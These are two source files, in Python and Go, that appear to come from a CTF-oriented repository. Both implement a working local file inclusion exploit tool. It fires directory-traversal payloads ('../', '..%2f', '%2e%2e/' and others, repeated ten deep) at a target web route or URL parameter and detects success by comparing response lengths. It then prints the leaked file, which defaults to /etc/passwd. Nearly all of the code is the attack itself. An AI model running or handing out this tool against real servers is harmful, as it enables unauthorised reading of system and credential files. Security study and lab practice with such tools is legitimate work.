File: LFI/lfi.py
#!/usr/bin/env python3

import argparse
import os
import platform
import random
import re
import requests
import string

############################################################
# Global Variables
############################################################

ANSI_CLRLN = "\r\x1b[2K\r"
ANSI_RST = "\x1b[0m"
ANSI_GRN = "\x1b[32;1m"
ANSI_RED = "\x1b[31;1m"
ANSI_BLU = "\x1b[34;1m"
ANSI_YLW = "\x1b[33;1m"

HTTPS_ENABLED = False

############################################################
# Formatting Functions
############################################################

def SucMsg(msg):
    print(f"{ANSI_CLRLN}[{ANSI_GRN}+{ANSI_RST}] {msg}")
    return

def ErrMsg(msg):
    print(f"{ANSI_CLRLN}[{ANSI_RED}-{ANSI_RST}] {msg}")
    return

def InfoMsg(msg):
    print(f"{ANSI_CLRLN}[{ANSI_BLU}i{ANSI_RST}] {msg}")
    return

def InfoMsgNB(msg):
    print(f"{ANSI_CLRLN}[{ANSI_BLU}i{ANSI_RST}] {msg}", end="")
    return

def SysMsg(msg):
    print(f"{ANSI_CLRLN}[{ANSI_YLW}*{ANSI_RST}] {msg}")
    return

def SysMsgNB(msg):
    print(f"{ANSI_CLRLN}[{ANSI_YLW}*{ANSI_RST}] {msg}", end="")
    return

############################################################
# Validation Functions
############################################################

def port_type(portno):
    portno = int(portno)

    if (portno < 1) or (portno > 65535):
        raise argparse.ArgumentError("Port must be within range 1 - 65535.")

    return portno

############################################################

def FindFlag(data, flagPattern=None):
    flag = str()
    message = str()
    success = bool()

    try:
        ############################################################
        # Make sure data var is bytes or string.
        ############################################################
        if not(isinstance(data,str)) and not(isinstance(data,bytes)):
            raise TypeError(f"Data must be string or bytes. Got {type(data)}.")

        if isinstance(data,str):
            data = data.encode('utf-8')

        ############################################################
        # Normalize data.
        ############################################################
        data = data.lower()

        if flagPattern is None:
            flagPattern = "thm{.*}"
 
        ############################################################
        # Make sure flag pattern var is bytes or string.
        ############################################################
        if not(isinstance(flagPattern,str)) and not(isinstance(flagPattern,bytes)):
            raise TypeError(f"FlagPattern must be string or bytes. Got {type(flagPattern)}.")

        ############################################################
        # Normalize flag pattern.
        ############################################################
        flagPattern = flagPattern.lower()

        ############################################################
        # Match type of data and flag pattern.
        ############################################################
        if type(flagPattern) != type(data):
            if isinstance(flagPattern,bytes):
                data = data.encode()
            elif isinstance(data,bytes):
                flagPattern = flagPattern.encode()

        ############################################################
        # Search for flag pattern.
        ############################################################
        reg = re.compile(flagPattern)
        matches = reg.findall(data)

        if len(matches) < 1:
            raise ValueError("flag not found in data")
        
        flag = matches[0]

        if isinstance(flag,bytes):
            flag = flag.decode('utf-8')

        message = f"flag found: \"{flag}\""
        success = True
    except Exception as ex:
        flag = ""
        message = str(ex)
        success = False

    return (flag, success, message)

def GenRandomString(minlen = None, maxlen = None):
    message = str()
    randstring = str()
    success = bool()

    try:
        alphabet = f"{string.ascii_lowercase}{string.ascii_uppercase}{string.digits}"

        ############################################################
        # Validate minlen value
        ############################################################
        if minlen is None:
            minlen = 8
        elif not(isinstance(minlen,int)):
            raise TypeError("Minlen must be int. Got {type(minlen)}")
        elif minlen < 1:
            raise ValueError("Minlen must be greater than 0")

        ############################################################
        # Validate maxlen value
        ############################################################
        if maxlen is None:
            maxlen = 15
        elif not(isinstance(maxlen,int)):
            raise TypeError("Minlen must be int. Got {type(maxlen)}")
        elif maxlen < 1:
            raise ValueError("Minlen must be greater than 0")

        ############################################################
        # Make sure minlen <= maxlen
        ############################################################
        if minlen > maxlen:
            tmp = maxlen
            maxlen = minlen
            minlen = tmp

        ############################################################
        # Choose length of string
        ############################################################
        stringlen = random.randrange(minlen, maxlen)

        ############################################################
        # Build random string
        ############################################################
        for i in range(stringlen):
            curchoice = random.choice(alphabet)
            randstring = f"{randstring}{curchoice}"

        message = "random string generated"
        success = True
    except Exception as ex:
        message = str(ex)
        randstring = ""
        success = False
    return (randstring, success, message)

def LFIChecker(baseurl, targetfile = None, parameter = None, paramval = None):
    content = str()
    message = str()
    success = bool()

    lfipatterns = ["../", "..%2f", "%2e%2e/", "..//", ".././"]

    baselen = int()
    errlen = int()
    lfilen = int()

    lfifound = bool()

    try:
        if baseurl[-1] == "/":
            baseurl = baseurl[:-1]

        if targetfile is None:
            targetfile = "/etc/passwd"

        if not(isinstance(targetfile, str)) and not(isinstance(targetfile, bytes)):
            raise TypeError(f"Targetfile must be a string or bytes. Got {type(targetfile)}")

        if isinstance(targetfile, bytes):
            targetfile = targetfile.decode("utf-8")

        if targetfile[0] != "/":
            targetfile = f"/{targetfile}"

        if parameter:
            if not(isinstance(parameter, str)) and not(isinstance(parameter, bytes)):
                raise TypeError(f"Parameter must be string or bytes. Got {type(parameter)}")
            elif isinstance(parameter, bytes):
                parameter = parameter.decode("utf-8")

            if paramval is None:
                raise ValueError("must provide paramval when providing parameter to test")
            elif not(isinstance(paramval, str)) and not(isinstance(paramval, bytes)):
                raise TypeError(f"Paramval must be string or bytes. Got {type(paramval)}")
            elif isinstance(paramval, bytes):
                paramval = paramval.decode("utf-8")

            params = {parameter: paramval}

        SysMsgNB("getting base length ...")
        resp = requests.get(baseurl)
        if (resp.status_code != 200) and (parameter is None):
            raise ValueError(f"Bad Status Code ({resp.status_code} {resp.reason})")
        baselen = len(resp.text)

        SysMsgNB("getting error length ...")
        dneroute = GenRandomString()
        dneurl = f"{baseurl}/{dneroute}"
        resp = requests.get(dneurl)
        errlen = len(resp.text)

        if parameter:
            SysMsgNB("getting parameter length ...")
            resp = requests.get(baseurl, params=params)
            if resp.status_code >= 400:
                raise ValueError(f"Bad Status Code ({resp.status_code} {resp.reason})")
            paramlen = len(resp.text)
        print(ANSI_CLRLN, end="")

        print(f"\n{ANSI_RED}{'-'*60}{ANSI_RST}")
        print(f"{ANSI_GRN}{'Baselines':^60}{ANSI_RST}")
        print(f"{ANSI_RED}{'-'*60}{ANSI_RST}")
        InfoMsg(f"Base Length: {baselen}")
        InfoMsg(f"Error Length: {errlen}")
        if parameter:
            InfoMsg(f"Parameter Length: {paramlen}")
        print(f"{ANSI_RED}{'-'*60}{ANSI_RST}\n")

        walkdepth = 10
        for lfipattern in lfipatterns:
            SysMsgNB(f"testing pattern \"{lfipattern}\" ...")

            walk = lfipattern * walkdepth
            attack = f"{walk}{targetfile}"
            bfroute = f"{walk}{dneroute}"

            if parameter:    
                SysMsgNB("checking bad file length ...")
                resp = requests.get(baseurl, params={parameter: bfroute})
                bflen = len(resp.text)

                params = {parameter: attack}
                resp = requests.get(baseurl, params=params)
                if resp.status_code != 200:
                    continue
                attacklen = len(resp.text)

                if (attacklen != baselen) and (attacklen != errlen) and (attacklen != paramlen) and (attacklen != bflen):
                    SucMsg(f"LFI found using pattern: \"{lfipattern}\"")
                    lfifound = True
                    content = resp.text
            else:
                bfurl = f"{baseurl}/{bfroute}"
                resp = requests.get(bfurl)
                bflen = len(resp.text)

                attackurl = f"{baseurl}/{attack}"
                resp = requests.get(attackurl)
                if resp.status_code != 200:
                    continue
                attacklen = len(resp.text)

                if (attacklen != baselen) and (attacklen != errlen) and (attacklen != bflen):
                    SucMsg(f"LFI likely using pattern: \"{lfipattern}\"")
                    lfifound = True
                    content = resp.text

        if not(lfifound):
            raise ValueError("no LFI vulnerability discovered")

        content = content.replace("<!DOCTYPE html>","").replace("<html>","").replace("<body>","").replace("</body>","").replace("</html>","").strip()

        message = "lfi vulnerability discovered"
        success = True
    except Exception as ex:
        content = ""
        message = str(ex)
        success = False

    return (content, success, message)

def main():
    scheme = str()

    if platform.system().lower() == "windows":
        os.system("")
    
    parser = argparse.ArgumentParser()

    ############################################################
    # Setup required command-line arguments.
    ############################################################
    parser.add_argument("target", help="IP address of target.", type=str)
    parser.add_argument("port", help="Port to connect to target on.", type=port_type)

    parser.add_argument("-f", "--file", help="file to pull using LFI", type=str, dest="file", default="etc/passwd")
    parser.add_argument("-pn", "--paramname", help="url parameter for lfi", type=str, dest="paramname", default=None)
    parser.add_argument("-pv", "--paramval", help="url parameter working value", type=str, dest="paramval", default=None)
    parser.add_argument("-r", "--route", help="route to target for LFI", type=str, dest="route", default="")
    parser.add_argument("--secure", help="use HTTPS scheme", action="store_true", dest="secure")

    args = parser.parse_args()

    target = args.target
    port = args.port

    paramname = args.paramname
    paramval = args.paramval
    route = args.route
    secure = args.secure
    tgtfile = args.file

    ############################################################
    # Set HTTP scheme (HTTP or HTTPS) based on arguments.
    ############################################################
    if secure:
        scheme = "https"
    else:
        scheme = "http"

    print(f"{ANSI_RED}{'='*60}{ANSI_RST}")
    print(f"{ANSI_GRN}{'Target Information':^60}{ANSI_RST}")
    print(f"{ANSI_RED}{'='*60}{ANSI_RST}")
    InfoMsg(f"Target IP: {target}")
    InfoMsg(f"Target Port: {port}")
    InfoMsg(f"Scheme: {scheme}")
    print(f"{ANSI_RED}{'='*60}{ANSI_RST}")

    baseURL = f"{scheme}://{target}:{port}/{route}"

    content, success, message = LFIChecker(baseURL, parameter = paramname, paramval = paramval, targetfile = tgtfile)
    if not(success):
        ErrMsg(message)
        exit(1)
    SucMsg(message)

    print(f"\n{ANSI_RED}{'-'*60}{ANSI_RST}")
    print(f"{ANSI_GRN}{'File Content':^60}{ANSI_RST}")
    print(f"{ANSI_RED}{'-'*60}{ANSI_RST}")
    print(content)
    print(f"{ANSI_RED}{'-'*60}{ANSI_RST}")

    return

if __name__ == "__main__":
    main()

File: LFI/lfi.go
package main

import (
	"flag"
	"fmt"
	"io/ioutil"
	"math/rand"
	"net/http"
	"os"
	"regexp"
	"strings"
	"time"
)

const EnableVirtualTerminalProcessing uint32 = 0x4

var ANSI_SET bool = false

var ANSI_CLRLN string = "\r\x1b[2K\r"
var ANSI_CLRSC string = "\x1b[2J\x1b[H"
var ANSI_RST string = "\x1b[0m"
var ANSI_RED string = "\x1b[31;1m"
var ANSI_GRN string = "\x1b[32;1m"
var ANSI_YLW string = "\x1b[33;1m"
var ANSI_BLU string = "\x1b[34;1m"

type Client struct {
	baseURL string
	Route   string
	Session *http.Client
}

// ============================================================
//
// Function Name: GetBodyContent
//
// Author: Thomas Osgood
//
// Description:
//
//  Function designed to take make a GET request to a target
//  route and return the body content to the user.
//
// Input(s):
//
//  route - string. route to make GET request on.
//
// Return(s):
//
//  bodycontent - []byte. content pulled from target URL.
//  success - bool. indication of success.
//  message - string. status message.
//
// ============================================================
func (c *Client) GetBodyContent(route string) (bodycontent []byte, err error) {
	var targetURL string = fmt.Sprintf("%s/%s", c.baseURL, route)

	resp, err := c.Session.Get(targetURL)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()

	bodycontent, err = ioutil.ReadAll(resp.Body)
	if err != nil {
		return nil, err
	}

	return bodycontent, nil
}

// ============================================================
//
// Function Name: Testconnection
//
// Author: Thomas Osgood
//
// Description:
//
//  Function designed to test the connection to a target.
//
// Input(s):
//
//  None.
//
// Return(s):
//
//  success - bool. indication of success.
//  message - string. status message.
//
// ============================================================
func (c *Client) TestConnection() (success bool, message string) {
	SysMsgNB(fmt.Sprintf("testing connection to \"%s\"", c.baseURL))

	resp, err := c.Session.Get(c.baseURL)
	if err != nil {
		return false, err.Error()
	}
	defer resp.Body.Close()

	return true, "client connection successful"
}

// ============================================================
//
// Function Name: Test_LFI_Parameter
//
// Author: Thomas Osgood
//
// Description:
//
//  Function designed to test whether a URL parameter is
//  susceptable to an LFI attack.
//
// Input(s):
//
//  route - string. route to test.
//  parameter - string. parameter to test.
//  goodval - string. a value that is known to give a 200 OK.
//  targetfile - string. file to attempt to leak.
//
// Return(s):
//
//  contents - string. file content pulled.
//  success - bool. indication of success.
//  message - string. status message.
//
// ============================================================
func (c *Client) Test_LFI_Parameter(route string, parameter string, goodval string, targetfile string) (contents string, success bool, message string) {
	var attacklen int
	var baselen int
	var errlen int

	var bodycontent []byte
	var dnestring string
	var err error

	var lfifound bool = false
	var lfipatterns []string = []string{"../", "..//", "..%2f", "%2e%2e/", ".././"}

	var patternstring string
	var paramstring string

	var targetroute string

	//============================================================
	// Check length of return when providing good parameter val.
	//============================================================

	paramstring = fmt.Sprintf("%s=%s", parameter, goodval)
	targetroute = fmt.Sprintf("%s?%s", route, paramstring)

	bodycontent, err = c.GetBodyContent(targetroute)
	if err != nil {
		return "", false, err.Error()
	}
	baselen = len(bodycontent)

	//============================================================
	// Check length of return when providing page that
	// does not exist.
	//============================================================

	dnestring, success, message = GenRandomName()
	if !success {
		return "", false, message
	}

	paramstring = fmt.Sprintf("%s=%s", parameter, dnestring)
	targetroute = fmt.Sprintf("%s?%s", route, paramstring)

	bodycontent, err = c.GetBodyContent(targetroute)
	if err != nil {
		return "", false, err.Error()
	}
	errlen = len(bodycontent)

	PrintChar('-', 60)
	PrintCenter("Baselines", 60)
	PrintChar('-', 60)
	InfMsg(fmt.Sprintf("Base Length: %d", baselen))
	InfMsg(fmt.Sprintf("Error Length: %d", errlen))
	PrintChar('-', 60)
	fmt.Printf("\n")

	//============================================================
	// Check to see if LFI vulnerability present.
	//
	// The length of return of the target file must not be
	// the same as the baselen or errlen.
	//============================================================

	PrintChar('-', 60)
	PrintCenter("Test Results", 60)
	PrintChar('-', 60)

	for _, lfipattern := range lfipatterns {
		SysMsgNB(fmt.Sprintf("testing \"%s\" ...", lfipattern))

		patternstring = ""
		for i := 0; i < 10; i++ {
			patternstring = fmt.Sprintf("%s%s", patternstring, lfipattern)
		}
		patternstring = fmt.Sprintf("%s%s", patternstring, targetfile)

		paramstring = fmt.Sprintf("%s=%s", parameter, patternstring)
		targetroute = fmt.Sprintf("%s?%s", route, paramstring)

		bodycontent, err = c.GetBodyContent(targetroute)
		if err != nil {
			continue
		}
		attacklen = len(bodycontent)

		if (attacklen != baselen) && (attacklen != errlen) {
			lfifound = true
			SucMsg(fmt.Sprintf("LFI found using \"%s\"", lfipattern))
			contents = string(bodycontent)
			contents = strings.ReplaceAll(contents, "<!DOCTYPE html>", "")
			contents = strings.ReplaceAll(contents, "<html>", "")
			contents = strings.ReplaceAll(contents, "</html>", "")
			contents = strings.ReplaceAll(contents, "<body>", "")
			contents = strings.ReplaceAll(contents, "</body>", "")
			contents = strings.Trim(contents, "\n\t ")
		}
	}

	if !lfifound {
		ErrMsg("no LFI vulnerability discovered")
	}
	PrintChar('-', 60)
	fmt.Printf("\n")

	return contents, true, "LFI discovered"
}

func SucMsg(msg string) {
	fmt.Printf("%s[%s+%s] %s\n", ANSI_CLRLN, ANSI_GRN, ANSI_RST, msg)
	return
}

func ErrMsg(msg string) {
	fmt.Printf("%s[%s-%s] %s\n", ANSI_CLRLN, ANSI_RED, ANSI_RST, msg)
	return
}

func InfMsg(msg string) {
	fmt.Printf("%s[%si%s] %s\n", ANSI_CLRLN, ANSI_BLU, ANSI_RST, msg)
	return
}

func InfMsgNB(msg string) {
	fmt.Printf("%s[%si%s] %s", ANSI_CLRLN, ANSI_BLU, ANSI_RST, msg)
	return
}

func SysMsg(msg string) {
	fmt.Printf("%s[%s*%s] %s\n", ANSI_CLRLN, ANSI_YLW, ANSI_RST, msg)
	return
}

func SysMsgNB(msg string) {
	fmt.Printf("%s[%s*%s] %s", ANSI_CLRLN, ANSI_YLW, ANSI_RST, msg)
	return
}

func ValidatePort(portno int) (success bool, message string) {
	if (portno < 1) || (portno > 65535) {
		return false, "port must be between 1 and 65535"
	}
	return true, "port valid"
}

//============================================================
//
// Function Name: PrintCenter
//
// Author: Thomas Osgood
//
// Description:
//
//  Function designed to print a message in the center of a
//  specified number of columns (n).
//
// Input(s):
//
//  msg - string. message to display.
//  n - int. total number of columns in row.
//
// Return(s):
//
//  None
//
//============================================================
func PrintCenter(msg string, n int) {
	var ansi_indent string = "\x1b%s"
	var indent_format string = "[%dC"
	var indent int

	fmt.Printf("%s", ANSI_CLRLN)
	if len(msg) > n {
		fmt.Printf("%s\n", msg)
		return
	}

	indent = (n - len(msg)) / 2
	indent_format = fmt.Sprintf(indent_format, indent)
	ansi_indent = fmt.Sprintf(ansi_indent, indent_format)

	fmt.Printf("%s%s%s%s\n", ansi_indent, ANSI_YLW, msg, ANSI_RST)

	return
}

func PrintChar(char byte, n int) {
	if n < 1 {
		return
	}

	for i := 0; i < n; i++ {
		fmt.Printf("%s%s%s", ANSI_RED, string(char), ANSI_RST)
	}
	fmt.Printf("\n")
}

//============================================================
//
// Function Name: FindMatch
//
// Author: Thomas Osgood
//
// Description:
//
//  Function designed to take a byte slice, search the slice
//  for a given regular expression pattern, and return the
//  first match of that pattern.
//
// Input(s):
//
//  bodycontent - []byte. byte slice to search for pattern.
//  tgtpattern - string. regex pattern to search for.
//
// Return(s):
//
//  match - string. first match of pattern discovered.
//  success - bool. indication of success.
//  message - string. status message.
//
//============================================================
func FindMatch(bodycontent []byte, tgtpattern string) (match string, success bool, message string) {

	re, err := regexp.Compile(tgtpattern)
	if err != nil {
		return "", false, err.Error()
	}

	matches := re.FindAll(bodycontent, -1)

	if len(matches) < 1 {
		return "", false, "no match found"
	}

	match = string(matches[0])

	return match, true, "match found"
}

// ============================================================
//
// Function Name: GenRandomName
//
// Author: Thomas Osgood
//
// Description:
//
//  Function designed to generate a random string 8 characters
//  long, containing only alpha-numeric characters.
//
// Input(s):
//
//  None.
//
// Return(s):
//
//  success - bool. indication of success.
//  message - string. status message.
//
// ============================================================
func GenRandomName() (name string, success bool, message string) {
	const charset string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	const length int = 8

	name = ""

	for i := 0; i < length; i++ {
		name = fmt.Sprintf("%s%s", name, string(charset[rand.Intn(len(charset))]))
	}

	return name, true, "name successfully generated"
}

func init() {
	return
}

func main() {
	var domain string
	var port int

	var baseURL string
	var scheme string

	var secure bool

	var paramname string
	var paramval string
	var route string
	var targetfile string

	var client Client = Client{Session: &http.Client{Timeout: 10 * time.Second}}

	flag.StringVar(&domain, "d", "127.0.0.1", "domain or ip address of target")
	flag.StringVar(&targetfile, "f", "etc/passwd", "file to pull contents of")
	flag.IntVar(&port, "p", 80, "port to communicate with target on")
	flag.StringVar(&paramname, "pn", "name", "parameter name")
	flag.StringVar(&paramval, "pv", "lfiattack", "good parameter value")
	flag.StringVar(&route, "r", "article", "route to attack")
	flag.BoolVar(&secure, "s", false, "use HTTPS instead of HTTP")
	flag.Parse()

	success, message := ValidatePort(port)
	if !success {
		ErrMsg(message)
		os.Exit(1)
	}

	PrintChar('=', 60)
	PrintCenter("Target Information", 60)
	PrintChar('=', 60)
	InfMsg(fmt.Sprintf("Target Domain: %s", domain))
	InfMsg(fmt.Sprintf("Target Port: %d", port))
	InfMsg(fmt.Sprintf("HTTPS: %v", secure))
	PrintChar('=', 60)

	//============================================================
	// HTTPS check.
	//============================================================
	if secure {
		scheme = "https"
	} else {
		scheme = "http"
	}
	baseURL = fmt.Sprintf("%s://%s:%d", scheme, domain, port)

	client.baseURL = baseURL

	//============================================================
	// Make sure the target is reachable.
	//============================================================
	success, message = client.TestConnection()
	if !success {
		ErrMsg(message)
		os.Exit(1)
	}
	SucMsg(message)
	fmt.Printf("\n")

	content, success, message := client.Test_LFI_Parameter(route, paramname, paramval, targetfile)
	if !success {
		ErrMsg(message)
		os.Exit(1)
	}

	PrintChar('-', 60)
	PrintCenter("File Contents", 60)
	PrintChar('-', 60)
	fmt.Printf("%s\n", content)
	PrintChar('-', 60)

	return
}

